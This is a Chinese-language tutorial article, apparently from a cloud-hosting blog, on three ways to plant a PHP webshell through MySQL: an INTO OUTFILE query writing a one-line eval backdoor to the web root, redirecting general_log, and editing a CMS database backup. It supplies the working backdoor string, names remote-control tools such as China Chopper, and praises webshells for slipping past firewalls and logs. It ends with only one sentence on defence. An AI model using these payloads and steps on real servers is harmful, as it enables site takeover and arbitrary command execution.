數據庫上傳WebShell的方式有哪些

這篇文章主要介紹“數據庫上傳WebShell的方式有哪些”，在日常操作中，相信很多人在數據庫上傳WebShell的方式有哪些問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”數據庫上傳WebShell的方式有哪些”的疑惑有所幫助！接下來，請跟著小編一起來學習吧！

一、什么是WebShell？

簡單的說來，webshell就是一個asp或php木馬后門，黑客在入侵了一個網站后，常常在將這些asp或php木馬后門文件放置在網站服務器的web目錄中，與正常的網頁文件混在一起。然后黑客就可以用web的方式，通過asp或php木馬后門控制網站服務器，包括上傳下載文件、查看數據庫、執行任意程序命令等。

為了更好理解WebShell我們學習兩個概念：

什么是“木馬”？

“木馬”全稱是“特洛伊木馬(Trojan Horse)”，原指古希臘士兵藏在木馬內進入敵方城市從而占領敵方城市的故事。

在Internet上，“特洛伊木馬”指一些程序設計人員在其可從網絡上下載 (Download)的應用程序或游戲中，包含了可以控制用戶的計算機系統的程序，可能造成用戶的系統被破壞甚至癱瘓。

什么是后門？

大家都知道，一臺計算機上有65535個端口，那么如果把計算機看作是一間屋子，那么這65535個端口就可以它看做是計算機為了與外界連接所開的65535 扇門。每個門的背后都是一個服務。有的門是主人特地打開迎接客人的（提供服務），有的門是主人為了出去訪問客人而開設的（訪問遠程服務）——理論上，剩下的其他門都該是關閉著的，但偏偏由于各種原因，很多門都是開啟的。于是就有好事者進入，主人的隱私被刺探，生活被打擾，甚至屋里的東西也被搞得一片狼跡。這扇悄然被開啟的門——就是“后門”。

webshell的優點

webshell 最大的優點就是可以穿越防火墻，由于與被控制的服務器或遠程主機交換的數據都是通過80端口傳遞的，因此不會被防火墻攔截。并且使用webshell一般不會在系統日志中留下記錄，只會在網站的web日志中留下一些數據提交記錄，沒有經驗的管理員是很難看出入侵痕跡的。

二、WebShell的分類

根據文件大小分類：大馬和小馬(通常指的是一句話木馬，能夠使用菜刀這類工具去直接連接它) 

根據腳本名稱分類：jsp、asp、aspx、php

小馬的功能比較單一，大馬的功能比較豐富，集成上傳下載、數據庫提權、CMD命令操作、克隆、代理等功能，如下圖所示。

三、利用數據庫上傳WebShell的三種方式

（1）into out file寫入

數據庫中secure_file_priv支持web目錄文件導出、數據庫用戶File權限、獲取物理路徑；該參數有三種狀態：

secure_file_priv=NULL;

表示寫入開關關閉；

secure_file_priv="";

表示寫入開關打開，且可以寫入任意目錄；

secure_file_priv="C:/phpStudy/PHPTutorial/WWW";

表示寫入開關打開，且寫入到指定的路徑下，如果寫入路徑不是Web路徑，也無法使用該功能寫入WehShell。

該開關無法通過SQL命令

set global secure_file_priv="C:/phpStudy/PHPTutorial/WWW"

參數打開開關，僅能通過修改mysql.ini配置文件修改，局限性比較大。

如果開關已經打開，正確寫入WebShell的SQL語句如下：

select "<?php @eval($_POST['cmd']);?>" into outfile "C://phpStudy//PHPTutorial//WWW//shell.php"

然后利用此菜刀、蟻劍或者冰蝎鏈接即可

（2）通過general_log日志寫入

可以通過修改日志開關即可上傳webshell，該方式需要數據庫root權限即可，通過SQL語句即可打開general_log開關并設置日志位置（需要提前知道Web的根路徑位置）；

修改完畢后，通過

select "<?php @eval($_POST['cmd']);?>"

即可寫入WebShell，寫入后的php文件內容如下圖所示

（3）通過備份數據庫漏洞寫入

數據庫備份為大多數CMS后臺管理頁面必備的功能，但是如果后臺校驗不嚴格，容易通過恢復備份方式上傳WebShell，以下以emlog的CMS講，測試版本5.3.0

 3.1查看web路徑地址

直接在管理頁面，點擊更多信息

在出來的phpinfo頁面搜索document_root即可

3.2 先備份數據庫

利用管理頁面的數據庫備份功能先備份數據庫

3.3修改備份文件內容

打開備份的SQL文件，在最后語句之前添加以下SQL語句

通過into outfile寫入webshell；最后通過菜刀鏈接即可。

四、如何防御WebShell？

數據庫應用應做好安全加固，不該開的開關盡量不要打開；同時做好數據庫備份和回復的后臺校驗工作，平時做好日常安全防護。

到此，關于“數據庫上傳WebShell的方式有哪些”的學習就結束了，希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學習，快去試試吧！若想繼續學習更多相關知識，請繼續關注億速云網站，小編會繼續努力為大家帶來更多實用的文章！